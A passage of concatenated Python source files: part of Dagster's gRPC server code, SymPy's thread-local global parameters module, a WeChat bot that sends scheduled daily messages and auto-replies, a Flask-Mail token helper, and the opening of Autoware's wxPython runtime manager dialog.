sequence_number=i,
serialized_external_repository_chunk=serialized_external_repository_data[
start_index:end_index
],
)
def ExternalScheduleExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_schedule_execution_args
)
check.inst_param(
args, "args", ExternalScheduleExecutionArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalScheduleExecutionReply(
serialized_external_schedule_execution_data_or_external_schedule_execution_error=serialize_dagster_namedtuple(
get_external_schedule_execution(
recon_repo,
args.instance_ref,
args.schedule_name,
args.scheduled_execution_timestamp,
args.scheduled_execution_timezone,
)
)
)
def ExternalSensorExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_sensor_execution_args
)
check.inst_param(args, "args", SensorExecutionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalSensorExecutionReply(
serialized_external_sensor_execution_data_or_external_sensor_execution_error=serialize_dagster_namedtuple(
get_external_sensor_execution(
recon_repo,
args.instance_ref,
args.sensor_name,
args.last_completion_time,
args.last_run_key,
)
)
)
def ShutdownServer(self, request, _context):
try:
self._shutdown_once_executions_finish_event.set()
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(success=True, serializable_error_info=None)
)
)
except: # pylint: disable=bare-except
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(
success=False,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
def CancelExecution(self, request, _context):
success = False
message = None
serializable_error_info = None
try:
cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_cancel_execution_request),
CancelExecutionRequest,
)
with self._execution_lock:
if cancel_execution_request.run_id in self._executions:
self._termination_events[cancel_execution_request.run_id].set()
self._termination_times[cancel_execution_request.run_id] = time.time()
success = True
except: # pylint: disable=bare-except
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
return api_pb2.CancelExecutionReply(
serialized_cancel_execution_result=serialize_dagster_namedtuple(
CancelExecutionResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def CanCancelExecution(self, request, _context):
can_cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_can_cancel_execution_request),
CanCancelExecutionRequest,
)
with self._execution_lock:
run_id = can_cancel_execution_request.run_id
can_cancel = (
run_id in self._executions and not self._termination_events[run_id].is_set()
)
return api_pb2.CanCancelExecutionReply(
serialized_can_cancel_execution_result=serialize_dagster_namedtuple(
CanCancelExecutionResult(can_cancel=can_cancel)
)
)
def StartRun(self, request, _context):
if self._shutdown_once_executions_finish_event.is_set():
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message="Tried to start a run on a server after telling it to shut down",
serializable_error_info=None,
)
)
)
try:
execute_run_args = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_execute_run_args),
ExecuteExternalPipelineArgs,
)
run_id = execute_run_args.pipeline_run_id
recon_pipeline = self._recon_pipeline_from_origin(execute_run_args.pipeline_origin)
except: # pylint: disable=bare-except
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message=None,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
event_queue = multiprocessing.Queue()
termination_event = multiprocessing.Event()
execution_process = multiprocessing.Process(
target=start_run_in_subprocess,
args=[
request.serialized_execute_run_args,
recon_pipeline,
event_queue,
termination_event,
],
)
with self._execution_lock:
execution_process.start()
self._executions[run_id] = (
execution_process,
execute_run_args.instance_ref,
)
self._termination_events[run_id] = termination_event
success = None
message = None
serializable_error_info = None
while success is None:
time.sleep(EVENT_QUEUE_POLL_INTERVAL)
# We use `get_nowait()` instead of `get()` so that we can handle the case where the
# execution process has died unexpectedly -- `get()` would hang forever in that case
try:
dagster_event_or_ipc_error_message_or_done = event_queue.get_nowait()
except queue.Empty:
if not execution_process.is_alive():
# subprocess died unexpectedly
success = False
message = (
"GRPC server: Subprocess for {run_id} terminated unexpectedly with "
"exit code {exit_code}".format(
run_id=run_id, exit_code=execution_process.exitcode,
)
)
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
else:
if isinstance(
dagster_event_or_ipc_error_message_or_done, StartRunInSubprocessSuccessful
):
success = True
elif isinstance(
dagster_event_or_ipc_error_message_or_done, RunInSubprocessComplete
):
continue
if isinstance(dagster_event_or_ipc_error_message_or_done, IPCErrorMessage):
success = False
message = dagster_event_or_ipc_error_message_or_done.message
serializable_error_info = (
dagster_event_or_ipc_error_message_or_done.serializable_error_info
)
# Ensure that if the run failed, we remove it from the executions map before
# returning so that CanCancel will never return True
if not success:
with self._execution_lock:
self._clear_run(run_id)
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def _get_current_image(self):
return os.getenv("DAGSTER_CURRENT_IMAGE")
def GetCurrentImage(self, request, _context):
return api_pb2.GetCurrentImageReply(
serialized_current_image=serialize_dagster_namedtuple(
GetCurrentImageResult(
current_image=self._get_current_image(), serializable_error_info=None
)
)
)
@whitelist_for_serdes
class GrpcServerStartedEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerFailedToBindEvent(namedtuple("GrpcServerFailedToBindEvent", "")):
pass
def server_termination_target(termination_event, server):
termination_event.wait()
# We could make this grace period configurable if we set it in the ShutdownServer handler
server.stop(grace=5)
class DagsterGrpcServer:
def __init__(
self,
host="localhost",
port=None,
socket=None,
max_workers=1,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
ipc_output_file=None,
fixed_server_id=None,
):
check.opt_str_param(host, "host")
check.opt_int_param(port, "port")
check.opt_str_param(socket, "socket")
check.int_param(max_workers, "max_workers")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.invariant(
port is not None if seven.IS_WINDOWS else True,
"You must pass a valid `port` on Windows: `socket` not supported.",
)
check.invariant(
(port or socket) and not (port and socket),
"You must pass one and only one of `port` or `socket`.",
)
check.invariant(
host is not None if port else True, "Must provide a host when serving on a port",
)
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
self._ipc_output_file = check.opt_str_param(ipc_output_file, "ipc_output_file")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.invariant(
max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 if heartbeat is True",
)
self.server = grpc.server(ThreadPoolExecutor(max_workers=max_workers))
self._server_termination_event = threading.Event()
self._api_servicer = DagsterApiServer(
server_termination_event=self._server_termination_event,
loadable_target_origin=loadable_target_origin,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
# Create a health check servicer
self._health_servicer = health.HealthServicer()
health_pb2_grpc.add_HealthServicer_to_server(self._health_servicer, self.server)
add_DagsterApiServicer_to_server(self._api_servicer, self.server)
if port:
server_address = host + ":" + str(port)
else:
server_address = "unix:" + os.path.abspath(socket)
# grpc.Server.add_insecure_port returns:
# - 0 on failure
# - port number when a port is successfully bound
# - 1 when a UDS is successfully bound
res = self.server.add_insecure_port(server_address)
if socket and res != 1:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(socket)
if port and res != port:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(port)
def serve(self):
# Unfortunately it looks like ports bind late (here) and so this can fail with an error
# from C++ like:
#
# E0625 08:46:56.180112000 4697443776 server_chttp2.cc:40]
# {"created":"@1593089216.180085000","description":"Only 1 addresses added out of total
# 2 resolved","file":"src/core/ext/transport/chttp2/server/chttp2_server.cc",
# "file_line":406,"referenced_errors":[{"created":"@1593089216.180083000","description":
# "Unable to configure socket","fd":6,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":217,
# "referenced_errors":[{"created":"@1593089216.180079000",
# "description":"Address already in use","errno":48,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":190,"os_error":
# "Address already in use","syscall":"bind"}]}]}
#
# This is printed to stdout and there is no return value from server.start or exception
# raised in Python that we can use to handle this. The standard recipes for hijacking C
# stdout (so we could inspect this output and respond accordingly), e.g.
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/, don't seem
# to work (at least on Mac OS X) against grpc, and in any case would involve a huge
# cross-version and cross-platform maintenance burden. We have an issue open against grpc,
# https://github.com/grpc/grpc/issues/23315, and our own tracking issue at
self.server.start()
# Note: currently this is hardcoded as serving, since both services are cohosted
# pylint: disable=no-member
self._health_servicer.set("DagsterApi", health_pb2.HealthCheckResponse.SERVING)
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerStartedEvent())
server_termination_thread = threading.Thread(
target=server_termination_target,
args=[self._server_termination_event, self.server],
name="grpc-server-termination",
)
server_termination_thread.daemon = True
server_termination_thread.start()
self.server.wait_for_termination()
server_termination_thread.join()
self._api_servicer.cleanup()
class CouldNotStartServerProcess(Exception):
def __init__(self, port=None, socket=None):
super(CouldNotStartServerProcess, self).__init__(
"Could not start server with "
+ (
"port {port}".format(port=port)
if port is not None
else "socket {socket}".format(socket=socket)
)
)
def wait_for_grpc_server(server_process, ipc_output_file, timeout=15):
event = read_unary_response(ipc_output_file, timeout=timeout, ipc_process=server_process)
if isinstance(event, GrpcServerFailedToBindEvent):
raise CouldNotBindGrpcServerToAddress()
elif isinstance(event, GrpcServerStartedEvent):
return True
else:
raise Exception(
"Received unexpected IPC event from gRPC Server: {event}".format(event=event)
)
def open_server_process(
port,
socket,
loadable_target_origin=None,
max_workers=1,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
check.invariant((port or socket) and not (port and socket), "Set only port or socket")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.int_param(max_workers, "max_workers")
from dagster.core.test_utils import get_mocked_system_timezone
with seven.TemporaryDirectory() as temp_dir:
output_file = os.path.join(
temp_dir, "grpc-server-startup-{uuid}".format(uuid=uuid.uuid4().hex)
)
mocked_system_timezone = get_mocked_system_timezone()
subprocess_args = (
[
loadable_target_origin.executable_path
if loadable_target_origin and loadable_target_origin.executable_path
else sys.executable,
"-m",
"dagster.grpc",
]
+ (["--port", str(port)] if port else [])
+ (["--socket", socket] if socket else [])
+ ["-n", str(max_workers)]
+ (["--heartbeat"] if heartbeat else [])
+ (["--heartbeat-timeout", str(heartbeat_timeout)] if heartbeat_timeout else [])
+ (["--lazy-load-user-code"] if lazy_load_user_code else [])
+ (["--ipc-output-file", output_file])
+ (["--fixed-server-id", fixed_server_id] if fixed_server_id else [])
+ (
["--override-system-timezone", mocked_system_timezone]
if mocked_system_timezone
else []
)
)
if loadable_target_origin:
subprocess_args += loadable_target_origin.get_cli_args()
server_process = open_ipc_subprocess(subprocess_args)
try:
wait_for_grpc_server(server_process, output_file)
except:
if server_process.poll() is None:
server_process.terminate()
raise
return server_process
def open_server_process_on_dynamic_port(
max_retries=10,
loadable_target_origin=None,
max_workers=1,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
server_process = None
retries = 0
while server_process is None and retries < max_retries:
port = find_free_port()
try:
server_process = open_server_process(
port=port,
socket=None,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
except CouldNotBindGrpcServerToAddress:
pass
retries += 1
return server_process, port
def cleanup_server_process(server_process, timeout=3):
start_time = time.time()
while server_process.poll() is None and (time.time() - start_time) < timeout:
time.sleep(0.05)
if server_process.poll() is None:
server_process.terminate()
server_process.wait()
class GrpcServerProcess:
def __init__(
self,
loadable_target_origin=None,
force_port=False,
max_retries=10,
max_workers=1,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
self.port = None
self.socket = None
self.server_process = None
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.bool_param(force_port, "force_port")
check.int_param(max_retries, "max_retries")
check.int_param(max_workers, "max_workers")
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.bool_param(lazy_load_user_code, "lazy_load_user_code")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.invariant(
max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 if heartbeat is True",
)
if seven.IS_WINDOWS or force_port:
self.server_process, self.port = open_server_process_on_dynamic_port(
max_retries=max_retries,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
else:
self.socket = safe_tempfile_path_unmanaged()
self.server_process = open_server_process(
port=None,
socket=self.socket,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
if self.server_process is None:
raise CouldNotStartServerProcess(port=self.port, socket=self.socket)
def wait(self, timeout=30):
if self.server_process.poll() is None:
seven.wait_for_process(self.server_process, timeout=timeout)
def create_ephemeral_client(self):
from dagster.grpc.client import EphemeralDagsterGrpcClient
return EphemeralDagsterGrpcClient(
port=self.port, socket=self.socket, server_process=self.server_process
)
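# Illustrative usage sketch (added here, never called): construct a
# GrpcServerProcess for a given LoadableTargetOrigin and obtain an ephemeral
# client for it. Only names defined or imported in this module are used;
# lifecycle details of EphemeralDagsterGrpcClient live in dagster.grpc.client
# and are not shown here.
def _example_grpc_server_usage(loadable_target_origin):
    # On Windows (or with force_port=True) this binds a free TCP port,
    # otherwise it uses a temporary unix socket.
    server = GrpcServerProcess(loadable_target_origin=loadable_target_origin)
    client = server.create_ephemeral_client()
    return server, client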
|
parameters.py
|
"""Thread-safe global parameters"""
from .cache import clear_cache
from contextlib import contextmanager
from threading import local
class _global_parameters(local):
"""
Thread-local global parameters.
Explanation
===========
This class generates thread-local container for SymPy's global parameters.
    Every global parameter must be passed as a keyword argument when
    generating an instance.
    A variable, ``global_parameters``, is provided as the default instance of
    this class.
    WARNING! Although the global parameters are thread-local, SymPy's cache
    currently is not.
    This may lead to undesired results in multi-threaded operations.
Examples
========
>>> from sympy.abc import x
>>> from sympy.core.cache import clear_cache
>>> from sympy.core.parameters import global_parameters as gp
>>> gp.evaluate
True
>>> x+x
2*x
>>> log = []
>>> def f():
... clear_cache()
... gp.evaluate = False
... log.append(x+x)
... clear_cache()
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> print(log)
[x + x]
>>> gp.evaluate
True
>>> x+x
2*x
References
==========
.. [1] https://docs.python.org/3/library/threading.html
"""
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def __setattr__(self, name, value):
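        # Changing a global flag invalidates results SymPy may have cached
        # under the old setting, so clear the cache before the new value
        # takes effect.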
if getattr(self, name) != value:
clear_cache()
return super().__setattr__(name, value)
global_parameters = _global_parameters(evaluate=True, distribute=True, exp_is_pow=False)
@contextmanager
def evaluate(x):
""" Control automatic evaluation
Explanation
===========
This context manager controls whether or not all SymPy functions evaluate
by default.
Note that much of SymPy expects evaluated expressions. This functionality
is experimental and is unlikely to function as intended on large
expressions.
Examples
========
>>> from sympy import evaluate
>>> from sympy.abc import x
>>> print(x + x)
2*x
>>> with evaluate(False):
... print(x + x)
x + x
"""
old = global_parameters.evaluate
try:
global_parameters.evaluate = x
yield
finally:
global_parameters.evaluate = old
@contextmanager
def distribute(x):
""" Control automatic distribution of Number over Add
Explanation
===========
    This context manager controls whether or not Mul distributes Number over
    Add. The plan is to avoid distributing Number over Add in all of sympy.
    Once that is done, this context manager will be removed.
Examples
========
>>> from sympy.abc import x
>>> from sympy.core.parameters import distribute
>>> print(2*(x + 1))
2*x + 2
>>> with distribute(False):
... print(2*(x + 1))
2*(x + 1)
"""
old = global_parameters.distribute
try:
global_parameters.distribute = x
yield
finally:
global_parameters.distribute = old
@contextmanager
def _exp_is_pow(x):
"""
    Control whether ``e^x`` should be represented as ``exp(x)`` or as ``Pow(E, x)``.
Examples
========
>>> from sympy import exp
>>> from sympy.abc import x
>>> from sympy.core.parameters import _exp_is_pow
>>> with _exp_is_pow(True): print(type(exp(x)))
<class 'sympy.core.power.Pow'>
>>> with _exp_is_pow(False): print(type(exp(x)))
exp
"""
old = global_parameters.exp_is_pow
clear_cache()
try:
global_parameters.exp_is_pow = x
yield
finally:
clear_cache()
global_parameters.exp_is_pow = old
|
hongmeng.py
|
# coding=utf-8
"""
Send warm daily WeChat messages to several girlfriends on a schedule.
Core logic.
"""
import os
import time
import threading
from apscheduler.schedulers.blocking import BlockingScheduler
import itchat
from itchat.content import TEXT
from main.common import (
get_yaml
)
from main.utils import (
get_bot_info,
get_weather_info,
get_dictum_info,
get_diff_time,
)
reply_name_uuid_list = []
# fire the job again if it was missed within GRACE_PERIOD
GRACE_PERIOD = 15 * 60
def is_online(auto_login=False):
"""
    Check whether the WeChat session is still online.
    :param auto_login: bool, automatically re-login when True (defaults to False).
    :return: bool, True means still online; False means the connection has been lost.
"""
def _online():
"""
        Determine whether the user is still online by fetching the friend list.
        :return: bool, True means still online; False means the connection has been lost.
"""
try:
if itchat.search_friends():
return True
except IndexError:
return False
return True
    if _online(): return True  # Already online: return True right away.
    if not auto_login:  # Auto-login not requested: return False right away.
return False
    # Switch to another WeChat account and rescan the QR code.
is_forced_switch = get_yaml().get('is_forced_switch', False)
    for _ in range(2):  # Log in, trying at most 2 times.
        # To switch WeChat accounts, remove hotReload=True.
if os.environ.get('MODE') == 'server':
            # Show the login QR code on the command line.
itchat.auto_login(enableCmdQR=2, hotReload=(not is_forced_switch))
else:
itchat.auto_login(hotReload=(not is_forced_switch))
if _online():
            print('Login succeeded')
return True
    print('Login failed.')
return False
@itchat.msg_register([TEXT])
def text_reply(msg):
""" 监听用户消息 """
try:
# print(msg)
uuid = msg.fromUserName
if uuid in reply_name_uuid_list:
            receive_text = msg.text  # Message text sent by the friend.
            # Fetch the reply content from the Turing bot API.
reply_text = get_bot_info(receive_text)
            time.sleep(1)  # Sleep one second to be safe; remove it if you want faster replies.
            if reply_text:  # Reply only when the content is not empty.
                msg.user.send(reply_text)  # Send the reply.
                print('\nMessage from {}: {}\nReply to {}: {}'
                      .format(msg.user.nickName, receive_text, msg.user.nickName, reply_text))
else:
                print('Message from {}: {}\tauto-reply failed'
                      .format(msg.user.nickName, receive_text))
except Exception as e:
print(str(e))
def init_reply():
"""
    Initialize the data used for auto-reply.
:return:
"""
conf = get_yaml()
for name in conf.get('auto_reply_names', None):
friends = itchat.search_friends(name=name)
        if not friends:  # An empty result means the configured nickname is wrong.
            print('Nickname "{}" is invalid.'.format(name))
break
        name_uuid = friends[0].get('UserName')  # Take the first matching user's uuid.
if name_uuid not in reply_name_uuid_list:
reply_name_uuid_list.append(name_uuid)
def get_alarm_msg():
""" 定时提醒内容 """
conf = get_yaml()
for gf in conf.get('girlfriend_infos'):
prompting_msg = "\t \t\t贴心小卫士 \r\n"
dictum = get_dictum_info(gf.get('dictum_channel'))
weather = get_weather_info(gf.get('city_name'))
sweet_words = gf.get('sweet_words')
diff_time = get_diff_time(sweet_words, gf.get('start_date'))
send_msg = '\n'.join(x for x in [prompting_msg, dictum, weather, diff_time] if x)
print(send_msg)
if send_msg and is_online():
wechat_name = gf.get('wechat_name')
authors = itchat.search_friends(name=wechat_name)
if authors:
authors[0].send(send_msg)
                print('\nScheduled message for "{}":\n{}\nSent successfully...\n'.format(wechat_name, send_msg))
else:
                print('Failed to send the scheduled reminder: WeChat name {} is no longer valid.'.format(wechat_name))
def init_alarm():
""" 初始化定时提醒 """
alarm_info = get_yaml().get('alarm_info', None)
if not alarm_info: return
is_alarm = alarm_info.get('is_alarm', False)
if not is_alarm: return
alarm_timed = alarm_info.get('alarm_timed', None)
if not alarm_timed: return
hour, minute = [int(x) for x in alarm_timed.split(':')]
    # Scheduled job.
scheduler = BlockingScheduler()
    # Send the daily quote to the girlfriend around 9:30 every day.
scheduler.add_job(get_alarm_msg, 'cron', hour=hour,
minute=minute, misfire_grace_time=GRACE_PERIOD)
    # For testing: send a message every 2 minutes.
# scheduler.add_job(get_alarm_msg, 'interval', seconds=120)
    print('Scheduled reminders enabled...')
scheduler.start()
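# Minimal, self-contained sketch (added for illustration, never called) of the
# scheduling pattern used by init_alarm(): a daily cron job with a misfire
# grace period. The job body is a stand-in, not the real get_alarm_msg().
def _scheduler_sketch():
    def _demo_job():
        print('daily reminder fired')
    scheduler = BlockingScheduler()
    scheduler.add_job(_demo_job, 'cron', hour=9, minute=30,
                      misfire_grace_time=GRACE_PERIOD)
    scheduler.start()  # blocks the calling thread until the scheduler shuts down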
def run():
""" 主运行入口 """
if not is_online(auto_login=True):
        print('Login failed')
return
conf = get_yaml()
if conf.get('is_auto_relay', False):
def _itchatRun():
itchat.run()
init_reply()
thread = threading.Thread(target=_itchatRun, name='LoopThread')
thread.start()
        print('Turing auto-reply enabled...')
init_alarm()
thread.join()
else:
init_alarm()
if __name__ == '__main__':
run()
# get_alarm_msg()
pass
|
mail.py
|
#!/usr/bin/env python
# -*- coding=UTF-8 -*-
# *************************************************************************
# Copyright © 2015 JiangLin. All rights reserved.
# File Name: email.py
# Author:JiangLin
# Mail:xiyang0807@gmail.com
# Created Time: 2015-11-27 21:59:02
# *************************************************************************
from flask_mail import Mail
from flask_mail import Message
from threading import Thread
from itsdangerous import URLSafeTimedSerializer
from flask import current_app
class MapleMail(Mail):
def init_app(self, app):
self.app = app
super(MapleMail, self).init_app(app)
def send_async_email(self, app, msg):
with app.app_context():
self.send(msg)
def custom_email_send(self, to, template, subject):
msg = Message(subject, recipients=[to], html=template)
thr = Thread(target=self.send_async_email, args=[self.app, msg])
thr.start()
def custom_email_token(self, email):
config = current_app.config
serializer = URLSafeTimedSerializer(config['SECRET_KEY'])
token = serializer.dumps(email, salt=config['SECURITY_PASSWORD_SALT'])
return token
def custom_confirm_token(self, token, expiration=360):
config = current_app.config
serializer = URLSafeTimedSerializer(config['SECRET_KEY'])
try:
email = serializer.loads(
token,
salt=config['SECURITY_PASSWORD_SALT'],
max_age=expiration)
        except Exception:
return False
return email
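# Usage sketch (added for illustration, not part of the original module): the
# token round trip that custom_email_token()/custom_confirm_token() perform,
# shown standalone. The secret, salt and address below are placeholders.
def _token_roundtrip_sketch():
    serializer = URLSafeTimedSerializer('example-secret-key')
    token = serializer.dumps('user@example.com', salt='example-salt')
    try:
        email = serializer.loads(token, salt='example-salt', max_age=3600)
    except Exception:
        email = False  # expired or tampered token
    return email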
|
runtime_manager_dialog.py
|
#!/usr/bin/env python
"""
Copyright (c) 2015, Nagoya University
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Autoware nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import wx
import wx.lib.buttons
import wx.lib.agw.customtreectrl as CT
import gettext
import os
import re
import sys
import fcntl
import threading
import Queue
import time
import socket
import struct
import shlex
import signal
import subprocess
import psutil
import pty
import yaml
import datetime
import syslog
import rtmgr
import rospy
import std_msgs.msg
from std_msgs.msg import Bool
from decimal import Decimal
from runtime_manager.msg import ConfigRcnn
from runtime_manager.msg import ConfigCarDpm
from runtime_manager.msg import ConfigPedestrianDpm
from runtime_manager.msg import ConfigNdt
from runtime_manager.msg import ConfigNdtMapping
from runtime_manager.msg import ConfigNdtMappingOutput
from runtime_manager.msg import ConfigICP
from runtime_manager.msg import ConfigVoxelGridFilter
from runtime_manager.msg import ConfigRingFilter
from runtime_manager.msg import ConfigDistanceFilter
from runtime_manager.msg import ConfigRandomFilter
from runtime_manager.msg import ConfigWaypointFollower
from runtime_manager.msg import ConfigTwistFilter
from runtime_manager.msg import ConfigVelocitySet
from runtime_manager.msg import ConfigCarKf
from runtime_manager.msg import ConfigPedestrianKf
from runtime_manager.msg import ConfigLaneRule
from runtime_manager.msg import ConfigLaneSelect
from runtime_manager.msg import ConfigLaneStop
from runtime_manager.msg import ConfigCarFusion
from runtime_manager.msg import ConfigPedestrianFusion
from tablet_socket.msg import mode_cmd
from tablet_socket.msg import gear_cmd
from tablet_socket.msg import Waypoint
from tablet_socket.msg import route_cmd
from ndt_localizer.msg import ndt_stat
from geometry_msgs.msg import TwistStamped
from geometry_msgs.msg import Vector3
from runtime_manager.msg import accel_cmd
from runtime_manager.msg import steer_cmd
from runtime_manager.msg import brake_cmd
from runtime_manager.msg import indicator_cmd
from runtime_manager.msg import lamp_cmd
from runtime_manager.msg import traffic_light
from runtime_manager.msg import adjust_xy
SCHED_OTHER = 0
SCHED_FIFO = 1
SCHED_RR = 2
PROC_MANAGER_SOCK="/tmp/autoware_proc_manager"
class MyFrame(rtmgr.MyFrame):
def __init__(self, *args, **kwds):
rtmgr.MyFrame.__init__(self, *args, **kwds)
self.all_procs = []
self.all_cmd_dics = []
self.load_dic = self.load_yaml('param.yaml', def_ret={})
self.config_dic = {}
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.params = []
self.all_tabs = []
self.all_th_infs = []
self.log_que = Queue.Queue()
self.log_que_stdout = Queue.Queue()
self.log_que_stderr = Queue.Queue()
self.log_que_show = Queue.Queue()
#
# ros
#
		rospy.init_node('runtime_manager', anonymous=True)
rospy.Subscriber('to_rtmgr', std_msgs.msg.String, self.RosCb)
self.pub = rospy.Publisher('from_rtmgr', std_msgs.msg.String, queue_size=10)
#
# for Quick Start tab
#
tab = self.tab_qs
self.all_tabs.append(tab)
self.qs_cmd = {}
self.all_cmd_dics.append(self.qs_cmd)
self.qs_dic = self.load_yaml('qs.yaml')
self.add_params(self.qs_dic.get('params', []))
self.setup_buttons(self.qs_dic.get('buttons', {}), self.qs_cmd)
for nm in [ 'map', 'sensing', 'localization', 'detection', 'mission_planning', 'motion_planning' ]:
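			# exec_time keys have the form '<topic>.<msg type>.<attr>'; a missing
			# msg type falls back to std_msgs Float32 and a missing attr to 'data'.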
for key in self.qs_dic.get('exec_time', {}).get(nm, {}).keys():
(topic, msg, attr) = ( key.split('.') + [ None, None, None ] )[:3]
msg = globals().get(msg)
msg = msg if msg else std_msgs.msg.Float32
attr = attr if attr else 'data'
rospy.Subscriber(topic, msg, self.exec_time_callback, callback_args=(key, attr))
#
# for Setup tab
#
tab = self.tab_setup
self.all_tabs.append(tab)
setup_cmd = {}
self.all_cmd_dics.append(setup_cmd)
dic = self.load_yaml('setup.yaml')
self.add_params(dic.get('params', []))
self.setup_buttons(dic.get('buttons', {}), setup_cmd)
#
# for Map tab
#
tab = self.tab_map
self.all_tabs.append(tab)
self.map_cmd = {}
self.all_cmd_dics.append(self.map_cmd)
self.map_dic = self.load_yaml('map.yaml')
self.add_params(self.map_dic.get('params', []))
self.setup_buttons(self.map_dic.get('buttons', {}), self.map_cmd)
self.tc_point_cloud = self.obj_to_varpanel_tc(self.button_point_cloud, 'path_pcd')
self.tc_area_list = self.obj_to_varpanel_tc(self.button_area_lists, 'path_area_list')
self.label_point_cloud_bar.Destroy()
self.label_point_cloud_bar = BarLabel(tab, ' Loading... ')
self.label_point_cloud_bar.Enable(False)
def hook1G(args):
for f in args.get('func')().split(','):
sz = os.path.getsize(f)
if sz > 1024*1024*1024:
wx.MessageBox("Over 1GB\n\n{}\n({:,})".format(f, sz), caption='Warning')
args = { 'func':self.tc_point_cloud.GetValue }
hook_var = { 'hook':hook1G, 'args':args, 'flags':['every_time'] }
obj = self.button_point_cloud
gdic_v = self.obj_to_gdic(obj, {}).get('path_pcd', {})
gdic_v['hook_var'] = hook_var
#
# for Sensing tab
#
tab = self.tab_sensing
